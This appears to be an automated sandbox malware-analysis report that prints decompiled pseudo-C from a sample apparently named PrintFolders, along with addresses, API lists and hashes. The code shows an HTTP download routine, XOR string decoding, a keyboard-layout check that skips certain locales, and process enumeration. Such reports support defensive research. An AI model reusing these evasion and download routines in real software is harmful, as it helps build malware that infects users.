							_t241 =  *_t364;
							_t364 =  &(_t364[1]);
						} while (_t241 != 0);
						E00402550(MultiByteToWideChar,  &_v380, _t428);
						L0040EBCD(_t428);
						_t458 = _t457 + 4;
						_v8 = 1;
						_t244 = _v324;
						_t409 =  >=  ? _v380 :  &_v380;
						_t245 =  *((intOrPtr*)( *_t244 + 0x10))(_t244,  >=  ? _v380 :  &_v380, L"text",  &_v320, _t364 - _t407 >> 1);
						_v8 = 0;
						_t430 = _t245;
						_t410 = _v360;
						if(_t410 < 8) {
							L19:
							_v8 = 0xffffffff;
							_t403 = _v336;
							_v364 = 0;
							_v360 = 7;
							_v380 = 0;
							if(_t403 < 0x10) {
								L23:
								if(_t430 >= 0) {
									_t487 = _v320;
									if(_v320 != 0) {
										_t336 = ( *(_t440 + 0x34) - _v332) * 8 -  *(_t440 + 0x34) - _v332;
										_t251 = E0040EE0D(_t430, _t440, _t487, _t336);
										_t459 = _t458 + 4;
										_t371 =  *(_t440 + 0x34) - _v332;
										_v292 = 0;
										_push(0);
										_v300 = 0;
										_t431 =  *_v320;
										_push( &_v292);
										_v328 = _t251;
										_push( &_v300);
										_t403 = _v320;
										_push(_t371);
										_push(_t251);
										_push(_t336);
										_t337 = _v332;
										_push( *((intOrPtr*)(_t440 + 0x28)) + _t337);
										_push(_t371);
										_push(0);
										_push(_v320);
										if( *((intOrPtr*)( *_v320 + 0x10))() >= 0) {
											_t258 = _v292;
											_t414 =  *(_t440 + 0x30);
											_t373 =  &(_t337[_v292]);
											_t489 = _t414 - _t373;
											if(_t414 > _t373) {
												_t432 =  *((intOrPtr*)(_t440 + 0x28));
											} else {
												 *(_t440 + 0x30) =  &(_t373[0x3e8]);
												_t432 = E0040EE0D(_t431, _t440, _t489,  &(_t373[0x3e8]));
												E00401760(_t432,  *(_t440 + 0x30),  *((intOrPtr*)(_t440 + 0x28)), _t337);
												L0040EBCD( *((intOrPtr*)(_t440 + 0x28)));
												_t414 =  *(_t440 + 0x30);
												_t459 = _t459 + 0x10;
												_t258 = _v292;
												 *((intOrPtr*)(_t440 + 0x28)) = _t432;
											}
											_t403 = _t414 - _t337;
											E00401760(_t432 + _t337, _t414 - _t337, _v328, _t258);
											_t459 = _t459 + 8;
											 *(_t440 + 0x34) =  &(_t337[_v292]);
										}
										L0040EBCD(_v328);
										_t256 = _v320;
										 *((intOrPtr*)( *_t256 + 8))(_t256);
									}
								}
								_t247 = _v324;
								 *((intOrPtr*)( *_t247 + 8))(_t247);
								goto L32;
							} else {
								_t376 = _v356;
								_t403 = _t403 + 1;
								_t266 = _t376;
								if(_t403 < 0x1000) {
									L22:
									_push(_t403);
									E0040EDFF(_t376);
									_t458 = _t458 + 8;
									goto L23;
								} else {
									_t376 =  *(_t376 - 4);
									_t403 = _t403 + 0x23;
									if(_t266 - _t376 + 0xfffffffc > 0x1f) {
										goto L33;
									} else {
										goto L22;
									}
								}
							}
						} else {
							_t400 = _v380;
							_t423 = 2 + _t410 * 2;
							_t322 = _t400;
							if(_t423 < 0x1000) {
								L18:
								_push(_t423);
								E0040EDFF(_t400);
								_t458 = _t458 + 8;
								goto L19;
							} else {
								_t376 =  *(_t400 - 4);
								_t403 = _t423 + 0x23;
								if(_t322 - _t376 + 0xfffffffc > 0x1f) {
									L33:
									E00413527(_t334, _t403, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t451);
									_t452 = _t458;
									_push(0xffffffff);
									_push(0x42c315);
									_push( *[fs:0x0]);
									_t461 = _t458 - 0x48;
									_t273 =  *0x43d054 ^ _t452;
									__eflags = _t273;
									_v516 = _t273;
									_push(_t334);
									_push(_t440);
									_push(_t430);
									_push(_t273);
									 *[fs:0x0] =  &_v508;
									_v572 = _t376;
									_t416 = _v488;
									_t377 = _t416;
									_v540 = 0;
									_v544 = _t416;
									_v524 = 0;
									_v520 = 0xf;
									_t442 = _t377 + 1;
									_v540 = 0;
									do {
										_t275 =  *_t377;
										_t377 = _t377 + 1;
										__eflags = _t275;
									} while (_t275 != 0);
									E004026B0(_t334,  &_v52, _t416, _t377 - _t442);
									_v12 = 0;
									_t338 = _v32;
									__eflags = _t338 - 0x10;
									_t443 = _v36;
									_t417 = _t443;
									_t381 =  >=  ? _v52 :  &_v52;
									_t433 = E00402890( >=  ? _v52 :  &_v52, _t443,  >=  ? _v52 :  &_v52, "http://", 7);
									_t462 = _t461 + 0xc;
									__eflags = _t433 - 0xffffffff;
									if(_t433 == 0xffffffff) {
										L39:
										__eflags = _v32 - 0x10;
										_t340 =  >=  ? _v52 :  &_v52;
										__eflags = _t443;
										if(_t443 == 0) {
											L42:
											_t434 = _t433 | 0xffffffff;
											__eflags = _t434;
										} else {
											_t433 = E00410A50(_t340, 0x2f, _t443);
											_t462 = _t462 + 0xc;
											__eflags = _t433;
											if(_t433 == 0) {
												goto L42;
											} else {
												_t434 = _t433 - _t340;
											}
										}
										__eflags = _t443 - _t434;
										_v80 = 0;
										_v64 = 0;
										_t383 =  <  ? _t443 : _t434;
										_v60 = 0xf;
										__eflags = _v32 - 0x10;
										_t279 =  >=  ? _v52 :  &_v52;
										_v80 = 0;
										E004026B0(_t340,  &_v80,  >=  ? _v52 :  &_v52,  <  ? _t443 : _t434);
										_v12 = 1;
										_t281 = _v36;
										__eflags = _t281 - _t434;
										_t435 =  <  ? _t281 : _t434;
										__eflags = _v32 - 0x10;
										_t386 =  >=  ? _v52 :  &_v52;
										_t282 = _t281 - ( <  ? _t281 : _t434);
										_v36 = _t281 - ( <  ? _t281 : _t434);
										E004104C0( >=  ? _v52 :  &_v52,  &(( >=  ? _v52 :  &_v52)[ <  ? _t281 : _t434]), _t281 - ( <  ? _t281 : _t434) + 1);
										_t341 = _v84;
										_v88 = 0;
										E00413604(_t341 + 0x44, 0x104, _v56, 0x103);
										_t462 = _t462 + 0x1c;
										asm("sbb eax, eax");
										_t443 = InternetOpenA( *(_t341 + 0xc),  ~( *(_t341 + 0x38)) & 0x00000003,  *(_t341 + 0x38), 0, 0);
										_v92 = _t443;
										__eflags = _t443;
										if(_t443 != 0) {
											_v56 = 1;
											InternetSetOptionA(_t443, 0x41,  &_v56, 4);
											__eflags = _v60 - 0x10;
											_t307 =  >=  ? _v80 :  &_v80;
											_t308 = InternetConnectA(_t443,  >=  ? _v80 :  &_v80, 0x50,  *(_t341 + 0x3c),  *(_t341 + 0x40), 3, 0, 1);
											_t437 = InternetCloseHandle;
											_t344 = _t308;
											__eflags = _t344;
											if(_t344 != 0) {
												__eflags = _v32 - 0x10;
												_t395 =  >=  ? _v52 :  &_v52;
												_t447 = HttpOpenRequestA(_t344, "GET",  >=  ? _v52 :  &_v52, 0, 0, 0, 0x80400000, 1);
												__eflags = _t447;
												if(__eflags != 0) {
													E004019F0(_t344, InternetCloseHandle, __eflags, _t447);
													_t313 = HttpSendRequestA(_t447, 0, 0, 0, 0);
													__eflags = _t313;
													if(_t313 != 0) {
														_v88 = E00401B30(_t344, _v84, InternetCloseHandle, _t447);
													}
													 *_t437(_t447);
												}
												 *_t437(_t344);
												_t443 = _v92;
											}
											 *_t437(_t443);
										}
										_t418 = _v60;
										__eflags = _v88;
										_t338 = 0 | _v88 > 0x00000000;
										__eflags = _t418 - 0x10;
										if(_t418 < 0x10) {
											L55:
											_t419 = _v32;
											_v64 = 0;
											_v60 = 0xf;
											_v80 = 0;
											__eflags = _t419 - 0x10;
											if(_t419 < 0x10) {
												L59:
												 *[fs:0x0] = _v20;
												_pop(_t436);
												_pop(_t444);
												_pop(_t343);
												__eflags = _v28 ^ _t452;
												return E0040EBBF(_t338, _t343, _v28 ^ _t452, _t419, _t436, _t444);
											} else {
												_t391 = _v52;
												_t419 = _t419 + 1;
												_t294 = _t391;
												__eflags = _t419 - 0x1000;
												if(_t419 < 0x1000) {
													L58:
													_push(_t419);
													E0040EDFF(_t391);
													goto L59;
												} else {
													_t391 =  *((intOrPtr*)(_t391 - 4));
													_t419 = _t419 + 0x23;
													__eflags = _t294 - _t391 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L61;
													} else {
														goto L58;
													}
												}
											}
										} else {
											_t393 = _v80;
											_t420 = _t418 + 1;
											_t300 = _t393;
											__eflags = _t420 - 0x1000;
											if(_t420 < 0x1000) {
												L54:
												_push(_t420);
												E0040EDFF(_t393);
												_t462 = _t462 + 8;
												goto L55;
											} else {
												_t391 =  *((intOrPtr*)(_t393 - 4));
												_t419 = _t420 + 0x23;
												__eflags = _t300 - _t391 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L61;
												} else {
													goto L54;
												}
											}
										}
									} else {
										__eflags = _t443 - _t433;
										if(_t443 < _t433) {
											E004027F0(_t381, _t417);
											L61:
											E00413527(_t338, _t419, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t452);
											_push(_t443);
											_t445 = _t391;
											_t299 =  *(_t445 + 0x2c);
											 *(_t445 + 0x34) = 0;
											__eflags = _t299;
											if(_t299 != 0) {
												_t299 = L0040EBCD(_t299);
												 *(_t445 + 0x2c) = 0;
											}
											_push(_v4);
											L34();
											return _t299;
										} else {
											_t319 = _t443 - _t433;
											__eflags = _t319 - 7;
											_t422 =  <  ? _t319 : 7;
											__eflags = _t338 - 0x10;
											_t398 =  >=  ? _v52 :  &_v52;
											_t448 = _t443 - 7;
											_t399 =  &(( >=  ? _v52 :  &_v52)[_t433]);
											_v36 = _t448;
											__eflags = _t448 - _t433 + 1;
											E004104C0( &(( >=  ? _v52 :  &_v52)[_t433]),  &(( &(( >=  ? _v52 :  &_v52)[_t433]))[ <  ? _t319 : 7]), _t448 - _t433 + 1);
											_t443 = _v36;
											_t462 = _t462 + 0xc;
											goto L39;
										}
									}
								} else {
									goto L18;
								}
							}
						}
					}
				}
			}

0x00401b33
0x00401b35
0x00401b40
0x00401b41
0x00401b47
0x00401b4c
0x00401b4e
0x00401b51
0x00401b53
0x00401b54
0x00401b58
0x00401b5e
0x00401b60
0x00401b64
0x00401b67
0x00401b6d
0x00401b9c
0x00401b6f
0x00401b74
0x00401b7b
0x00401b80
0x00401b83
0x00401b86
0x00401b8d
0x00401b8d
0x00401bab
0x00401bb5
0x00401bc0
0x00401bd4
0x00401bda
0x00401be0
0x00401be2
0x00401be7
0x00401bed
0x00401bf3
0x00401bfb
0x00401c06
0x00401c0e
0x00401c16
0x00401c1b
0x00401c21
0x00401c24
0x00401c27
0x00401c27
0x00401c2d
0x00401c40
0x00401c4d
0x00401c52
0x00401c70
0x00401fd5
0x00401fdb
0x00401feb
0x00401ff3
0x00401ff4
0x00401ff5
0x00402003
0x00401c76
0x00401c7c
0x00401c90
0x00401c96
0x00401ca1
0x00401ca9
0x00000000
0x00401cbc
0x00401cbc
0x00401cc2
0x00401ccc
0x00401cd6
0x00401cd9
0x00401ce3
0x00401cea
0x00401cf0
0x00401cf0
0x00401cf2
0x00401cf3
0x00401d07
0x00401d0c
0x00401d1f
0x00401d25
0x00401d2f
0x00401d3e
0x00401d48
0x00401d59
0x00401d5e
0x00401d61
0x00401d74
0x00401d7c
0x00401d8a
0x00401d8c
0x00401d8e
0x00401d9a
0x00401da4
0x00401dae
0x00401db5
0x00401db5
0x00401dc0
0x00401dc0
0x00401dc3
0x00401dc6
0x00401dd7
0x00401ddd
0x00401de2
0x00401de5
0x00401def
0x00401e03
0x00401e13
0x00401e16
0x00401e1a
0x00401e1c
0x00401e25
0x00401e5c
0x00401e5e
0x00401e65
0x00401e6b
0x00401e75
0x00401e7f
0x00401e89
0x00401eba
0x00401ebc
0x00401ec2
0x00401ec9
0x00401edf
0x00401ee2
0x00401eed
0x00401ef3
0x00401ef9
0x00401f03
0x00401f05
0x00401f0f
0x00401f17
0x00401f1e
0x00401f24
0x00401f25
0x00401f2b
0x00401f2c
0x00401f30
0x00401f31
0x00401f39
0x00401f3a
0x00401f3b
0x00401f3d
0x00401f43
0x00401f45
0x00401f4b
0x00401f4e
0x00401f51
0x00401f53
0x00401f8d
0x00401f55
0x00401f5c
0x00401f67
0x00401f6f
0x00401f77
0x00401f7c
0x00401f7f
0x00401f82
0x00401f88
0x00401f88
0x00401f97
0x00401f9c
0x00401fa7
0x00401fac
0x00401fac
0x00401fb5
0x00401fba
0x00401fc6
0x00401fc6
0x00401ec9
0x00401fc9
0x00401fd2
0x00000000
0x00401e8b
0x00401e8b
0x00401e91
0x00401e92
0x00401e9a
0x00401eb0
0x00401eb0
0x00401eb2
0x00401eb7
0x00000000
0x00401e9c
0x00401e9c
0x00401e9f
0x00401eaa
0x00000000
0x00000000
0x00000000
0x00000000
0x00401eaa
0x00401e9a
0x00401e27
0x00401e27
0x00401e2d
0x00401e34
0x00401e3c
0x00401e52
0x00401e52
0x00401e54
0x00401e59
0x00000000
0x00401e3e
0x00401e3e
0x00401e41
0x00401e4c
0x00402006
0x00402006
0x0040200b
0x0040200c
0x0040200d
0x0040200e
0x0040200f
0x00402010
0x00402011
0x00402013
0x00402015
0x00402020
0x00402021
0x00402029
0x00402029
0x0040202b
0x0040202e
0x0040202f
0x00402030
0x00402031
0x00402035
0x0040203b
0x0040203e
0x00402041
0x00402043
0x0040204a
0x0040204d
0x00402054
0x0040205b
0x0040205e
0x00402062
0x00402062
0x00402064
0x00402065
0x00402065
0x00402070
0x00402075
0x0040207f
0x00402082
0x00402085
0x00402088
0x0040208a
0x0040209b
0x0040209d
0x004020a0
0x004020a3
0x004020e0
0x004020e0
0x004020e7
0x004020eb
0x004020ed
0x00402105
0x00402105
0x00402105
0x004020ef
0x004020f8
0x004020fa
0x004020fd
0x004020ff
0x00000000
0x00402101
0x00402101
0x00402101
0x004020ff
0x00402108
0x0040210a
0x00402113
0x0040211a
0x0040211d
0x00402124
0x0040212c
0x00402134
0x00402138
0x0040213d
0x00402144
0x00402147
0x00402149
0x0040214c
0x00402150
0x00402154
0x00402156
0x00402160
0x00402165
0x0040216b
0x00402183
0x0040218b
0x00402195
0x004021a4
0x004021a6
0x004021a9
0x004021ab
0x004021b6
0x004021c1
0x004021c7
0x004021d0
0x004021e2
0x004021e8
0x004021ee
0x004021f0
0x004021f2
0x004021f4
0x004021fd
0x00402219
0x0040221b
0x0040221d
0x00402220
0x0040222e
0x00402234
0x00402236
0x00402241
0x00402241
0x00402245
0x00402245
0x00402248
0x0040224a
0x0040224a
0x0040224e
0x0040224e
0x00402250
0x00402255
0x00402258
0x0040225b
0x0040225e
0x00402288
0x00402288
0x0040228b
0x00402292
0x00402299
0x0040229d
0x004022a0
0x004022ca
0x004022cf
0x004022d7
0x004022d8
0x004022d9
0x004022dd
0x004022e7
0x004022a2
0x004022a2
0x004022a5
0x004022a6
0x004022a8
0x004022ae
0x004022c0
0x004022c0
0x004022c2
0x00000000
0x004022b0
0x004022b0
0x004022b3
0x004022bb
0x004022be
0x00000000
0x00000000
0x00000000
0x00000000
0x004022be
0x004022ae
0x00402260
0x00402260
0x00402263
0x00402264
0x00402266
0x0040226c
0x0040227e
0x0040227e
0x00402280
0x00402285
0x00000000
0x0040226e
0x0040226e
0x00402271
0x00402279
0x0040227c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040227c
0x0040226c
0x004020a5
0x004020a5
0x004020a7
0x004022ea
0x004022ef
0x004022ef
0x004022f4
0x004022f5
0x004022f6
0x004022f7
0x004022f8
0x004022f9
0x004022fa
0x004022fb
0x004022fc
0x004022fd
0x004022fe
0x004022ff
0x00402300
0x00402303
0x00402304
0x00402306
0x00402309
0x00402310
0x00402312
0x00402315
0x0040231d
0x0040231d
0x00402324
0x00402329
0x00402330
0x004020ad
0x004020b2
0x004020b9
0x004020bb
0x004020be
0x004020c1
0x004020c5
0x004020c7
0x004020c9
0x004020ce
0x004020d5
0x004020da
0x004020dd
0x00000000
0x004020dd
0x004020a7
0x00000000
0x00000000
0x00000000
0x00401e4c
0x00401e3c
0x00401e25
0x00401ca9

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401BB5
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401BD4

Strings

text, xrefs: 00401E0C

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: cfdcce2f7d42716a26e30f2f88d0c2f3e955756d4473bc2f3cae5c265880f9cb
Instruction ID: 0e1f74b2381a2c47a752bf63778d692da1f3e37b415f6d44e4533426c8fd4264
Opcode Fuzzy Hash: cfdcce2f7d42716a26e30f2f88d0c2f3e955756d4473bc2f3cae5c265880f9cb
Instruction Fuzzy Hash: FDC17A70A002189FEB24CF25CD85BEAB7B9FF48704F1045E9E40AA7291DB75AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00404D40 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 368
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00404D40(void* __ebx, int* __ecx) {
				intOrPtr _v8;
				int _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				char _v80;
				char _v81;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				long _v100;
				int _v104;
				int _v120;
				char _v284;
				char _v288;
				char _v292;
				char _v540;
				struct HKL__* _v1564;
				int* _v1568;
				int _v1572;
				int _v1576;
				int _v1580;
				long _v1584;
				int _v1588;
				int _v1604;
				int* _v1608;
				intOrPtr _v1628;
				char _v1636;
				signed int _v1640;
				intOrPtr _v1652;
				intOrPtr _v1656;
				signed int _v1660;
				intOrPtr _v1696;
				intOrPtr _v1700;
				signed int _v1752;
				char _v2002;
				short _v2004;
				int* _v2020;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t130;
				signed int _t131;
				int _t134;
				int _t137;
				intOrPtr* _t139;
				intOrPtr _t143;
				int _t145;
				signed int _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t164;
				signed int _t170;
				short _t172;
				signed int _t177;
				signed int _t183;
				signed char _t189;
				signed char* _t190;
				void* _t195;
				long _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t204;
				int _t208;
				void* _t212;
				signed int _t213;
				void* _t220;
				signed int _t222;
				int _t223;
				void* _t224;
				intOrPtr _t232;
				int _t234;
				int _t237;
				signed int* _t238;
				signed int _t248;
				intOrPtr* _t249;
				signed int _t255;
				long _t259;
				void* _t260;
				void* _t264;
				signed char* _t265;
				signed int _t267;
				void* _t268;
				signed int _t269;
				void* _t270;
				int* _t271;
				void* _t272;
				int* _t274;
				void* _t275;
				void* _t276;
				signed int _t277;
				void* _t279;
				void* _t280;
				intOrPtr _t281;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				void* _t290;
				signed int _t293;
				signed int _t294;
				void* _t297;
				signed int _t299;

				_push(__ebx);
				_t220 = _t290;
				_t293 = (_t290 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t220 + 4));
				_t284 = _t293;
				_push(0xffffffff);
				_push(0x42c572);
				_push( *[fs:0x0]);
				_push(_t220);
				_t294 = _t293 - 0x630;
				_t130 =  *0x43d054; // 0x7bd02ead
				_t131 = _t130 ^ _t284;
				_v32 = _t131;
				_push(_t131);
				 *[fs:0x0] =  &_v24;
				_t274 = __ecx;
				_v1568 = __ecx;
				_v1608 = __ecx;
				asm("xorps xmm0, xmm0");
				_v1572 = 0;
				asm("movq [esi], xmm0");
				__ecx[2] = 0;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = 0;
				_v16 = 0;
				_v1572 = 1;
				_t134 = GetKeyboardLayoutList(0x400,  &_v1564);
				_t267 = 0;
				_v1568 = _t134;
				if(_t134 <= 0) {
					L12:
					 *[fs:0x0] = _v24;
					_pop(_t268);
					_pop(_t275);
					return E0040EBBF(_t274, _t220, _v32 ^ _t284, _t259, _t268, _t275);
				} else {
					do {
						_t137 =  *(_t284 + _t267 * 4 - 0x610) & 0x0000ffff;
						_v1576 = _t137;
						GetLocaleInfoA(_t137, 2,  &_v540, 0x1f4); // executed
						_t139 =  &_v540;
						_v1604 = 0;
						_v1588 = 0;
						_t260 = _t139 + 1;
						_v1584 = 0xf;
						_v1604 = 0;
						do {
							_t232 =  *_t139;
							_t139 = _t139 + 1;
						} while (_t232 != 0);
						E004026B0(_t220,  &_v1604,  &_v540, _t139 - _t260);
						_t234 = _v1576;
						_v1580 = _t234;
						_v16 = 1;
						_t143 =  *((intOrPtr*)(_t274 + 4));
						if(_t143 ==  *((intOrPtr*)(_t274 + 8))) {
							_push( &_v1604);
							_push(_t143);
							E0040CC40(_t220, _t274, _t267, _t274);
							_t259 = _v1584;
						} else {
							asm("movups xmm0, [ebp-0x638]");
							_t259 = 0xf;
							_v1604 = 0;
							asm("movups [eax], xmm0");
							asm("movq xmm0, [ebp-0x628]");
							asm("movq [eax+0x10], xmm0");
							 *(_t143 + 0x18) = _t234;
							 *((intOrPtr*)(_t274 + 4)) =  *((intOrPtr*)(_t274 + 4)) + 0x1c;
						}
						_v16 = 0;
						if(_t259 < 0x10) {
							goto L11;
						} else {
							_t237 = _v1604;
							_t259 = _t259 + 1;
							_t145 = _t237;
							if(_t259 < 0x1000) {
								L10:
								_push(_t259);
								E0040EDFF(_t237);
								_t294 = _t294 + 8;
								goto L11;
							} else {
								_t237 =  *(_t237 - 4);
								_t259 = _t259 + 0x23;
								if(_t145 - _t237 + 0xfffffffc > 0x1f) {
									E00413527(_t220, _t259, __eflags);
									asm("int3");
									_push(_t284);
									_t286 = _t294;
									_push(0xffffffff);
									_push(0x42c5b5);
									_push( *[fs:0x0]);
									_t297 = _t294 - 0x5c;
									_t151 =  *0x43d054; // 0x7bd02ead
									_t152 = _t151 ^ _t286;
									_v1640 = _t152;
									_push(_t220);
									_push(_t274);
									_push(_t267);
									_push(_t152);
									 *[fs:0x0] =  &_v1636;
									_t222 = 0;
									_t238 =  &_v1660;
									asm("xorps xmm0, xmm0");
									_v1696 = 0;
									asm("movq [ebp-0x24], xmm0");
									_v1652 = 0;
									E00404D40(0, _t238); // executed
									_v1628 = 0;
									_t155 = _v1656;
									_t269 = _v1660;
									_v1700 = _t155;
									__eflags = _t269 - _t155;
									if(_t269 == _t155) {
										L41:
										_t223 = 0;
										__eflags = 0;
										goto L42;
									} else {
										_v40 = 0x5d5d5b7c;
										_v36 = 0x2e404f47;
										_t281 =  *((intOrPtr*)( *[fs:0x2c]));
										_v96 = _t281;
										do {
											E0040BB90(_t222,  &_v80, _t259, _t269, _t269);
											_v56 =  *((intOrPtr*)(_t269 + 0x18));
											_v20 = 1;
											_t188 =  *0x451008;
											__eflags =  *0x451008 -  *((intOrPtr*)(_t281 + 4));
											if( *0x451008 >  *((intOrPtr*)(_t281 + 4))) {
												E0040EF48(_t188, 0x451008);
												_t297 = _t297 + 4;
												__eflags =  *0x451008 - 0xffffffff;
												if(__eflags == 0) {
													_t62 =  &_v40; // 0x5d5d5b7c
													 *0x450d20 =  *_t62;
													_t63 =  &_v36; // 0x2e404f47
													 *0x450d24 =  *_t63;
													E0040F25B( &_v80, __eflags, 0x42cee0);
													E0040EEFE(0x451008);
													_t297 = _t297 + 8;
												}
											}
											_t189 =  *0x450d27; // 0x0
											__eflags = _t189;
											if(_t189 != 0) {
												 *0x450d20 =  *0x450d20 ^ 0x0000002e;
												 *0x450d21 =  *0x450d21 ^ 0x0000002e;
												 *0x450d22 =  *0x450d22 ^ 0x0000002e;
												 *0x450d23 =  *0x450d23 ^ 0x0000002e;
												 *0x450d24 =  *0x450d24 ^ 0x0000002e;
												 *0x450d25 =  *0x450d25 ^ 0x0000002e;
												 *0x450d26 =  *0x450d26 ^ 0x0000002e;
												_t213 = _t189 ^ 0x0000002e;
												__eflags = _t213;
												 *0x450d27 = _t213;
											}
											_t190 = 0x450d20;
											_v120 = 0;
											_v104 = 0;
											_v100 = 0xf;
											_t67 =  &(_t190[1]); // 0x450d21
											_t265 = _t67;
											do {
												_t255 =  *_t190;
												_t190 =  &(_t190[1]);
												__eflags = _t255;
											} while (_t255 != 0);
											E004026B0(_t222,  &_v120, 0x450d20, _t190 - _t265);
											_t274 = _v80;
											_t259 = _v64;
											__eflags = _v100 - 0x10;
											_v88 = _t222 | 0x00000001;
											_t223 = _v120;
											_t194 =  >=  ? _t223 :  &_v120;
											__eflags = _v60 - 0x10;
											_t238 =  >=  ? _t274 :  &_v80;
											_t195 = E00402890(_t238, _t259, _t238,  >=  ? _t223 :  &_v120, _v104);
											_t297 = _t297 + 0xc;
											__eflags = _t195 - 0xffffffff;
											if(_t195 != 0xffffffff) {
												L25:
												_v81 = 1;
											} else {
												__eflags = _v60 - 0x10;
												_t259 = _v64;
												_t238 =  >=  ? _t274 :  &_v80;
												_t212 = E00402890(_t238, _t259, _t238, 0x439a6c, 7);
												_t297 = _t297 + 0xc;
												_v81 = 0;
												__eflags = _t212 - 0xffffffff;
												if(_t212 != 0xffffffff) {
													goto L25;
												}
											}
											_v88 = _v88 & 0xfffffffe;
											_t196 = _v100;
											__eflags = _t196 - 0x10;
											if(_t196 < 0x10) {
												L30:
												__eflags = _v81;
												if(_v81 != 0) {
													L46:
													_t197 = _v60;
													__eflags = _t197 - 0x10;
													if(_t197 < 0x10) {
														L50:
														_t269 = _v52;
														_t223 = 1;
														L42:
														__eflags = _t269;
														if(_t269 == 0) {
															L52:
															 *[fs:0x0] = _v28;
															_pop(_t270);
															_pop(_t276);
															_pop(_t224);
															__eflags = _v32 ^ _t286;
															return E0040EBBF(_t223, _t224, _v32 ^ _t286, _t259, _t270, _t276);
														} else {
															_push(_t238);
															E0040D380(_t269, _v48, _t269, _t274);
															_t277 = _v52;
															_t299 = _t297 + 4;
															_t259 = (0x92492493 * (_v44 - _t277) >> 0x20) + _v44 - _t277 >> 4;
															_t164 = _t277;
															_t248 = ((_t259 >> 0x1f) + _t259) * 8 - (_t259 >> 0x1f) + _t259 << 2;
															__eflags = _t248 - 0x1000;
															if(_t248 < 0x1000) {
																L51:
																_push(_t248);
																E0040EDFF(_t277);
																goto L52;
															} else {
																_t277 =  *((intOrPtr*)(_t277 - 4));
																_t248 = _t248 + 0x23;
																__eflags = _t164 - _t277 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	E00413527(_t223, _t259, __eflags);
																	goto L54;
																} else {
																	goto L51;
																}
															}
														}
													} else {
														_t109 = _t197 + 1; // 0x11
														_t238 = _t109;
														_t198 = _t274;
														__eflags = _t238 - 0x1000;
														if(_t238 < 0x1000) {
															L49:
															_push(_t238);
															E0040EDFF(_t274);
															_t297 = _t297 + 8;
															goto L50;
														} else {
															_t277 =  *((intOrPtr*)(_t274 - 4));
															_t248 = _t238 + 0x23;
															__eflags = _t198 - _t277 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L54;
															} else {
																goto L49;
															}
														}
													}
												} else {
													_t202 = _v56;
													__eflags = _t202 - 0x419;
													if(_t202 == 0x419) {
														goto L46;
													} else {
														__eflags = _t202 - 0x422;
														if(_t202 == 0x422) {
															goto L46;
														} else {
															__eflags = _t202 - 0x423;
															if(_t202 == 0x423) {
																goto L46;
															} else {
																__eflags = _t202 - 0x43f;
																if(_t202 == 0x43f) {
																	goto L46;
																} else {
																	_v20 = 0;
																	_t203 = _v60;
																	__eflags = _t203 - 0x10;
																	if(_t203 < 0x10) {
																		goto L39;
																	} else {
																		_t93 = _t203 + 1; // 0x11
																		_t238 = _t93;
																		_t204 = _t274;
																		__eflags = _t238 - 0x1000;
																		if(_t238 < 0x1000) {
																			L38:
																			_push(_t238);
																			E0040EDFF(_t274);
																			_t297 = _t297 + 8;
																			goto L39;
																		} else {
																			_t277 =  *((intOrPtr*)(_t274 - 4));
																			_t248 = _t238 + 0x23;
																			__eflags = _t204 - _t277 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L54;
																			} else {
																				goto L38;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												_t86 = _t196 + 1; // 0x11
												_t238 = _t86;
												_t208 = _t223;
												__eflags = _t238 - 0x1000;
												if(_t238 < 0x1000) {
													L29:
													_push(_t238);
													E0040EDFF(_t223);
													_t274 = _v80;
													_t297 = _t297 + 8;
													goto L30;
												} else {
													_t223 =  *(_t223 - 4);
													_t248 = _t238 + 0x23;
													__eflags = _t208 - _t223 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														L54:
														E00413527(_t223, _t259, __eflags);
														asm("int3");
														asm("int3");
														_push(_t286);
														_t288 = _t299;
														_t170 =  *0x43d054; // 0x7bd02ead
														_v1752 = _t170 ^ _t288;
														_push(_t277);
														_push(_t269);
														_t271 = _t248;
														_v2020 = _t271;
														_v2020 = _t271;
														_t172 =  *0x439a7c; // 0x3e
														asm("movq xmm0, [0x439a74]");
														_v2004 = _t172;
														asm("movq [ebp-0x108], xmm0");
														E00410B00(_t271,  &_v2002, 0, 0xfa);
														_t279 = OpenProcess(0x410, 0, _t259);
														__eflags = _t279;
														if(_t279 != 0) {
															_t183 =  &_v292;
															__imp__K32EnumProcessModules(_t279, _t183, 4,  &_v288); // executed
															__eflags = _t183;
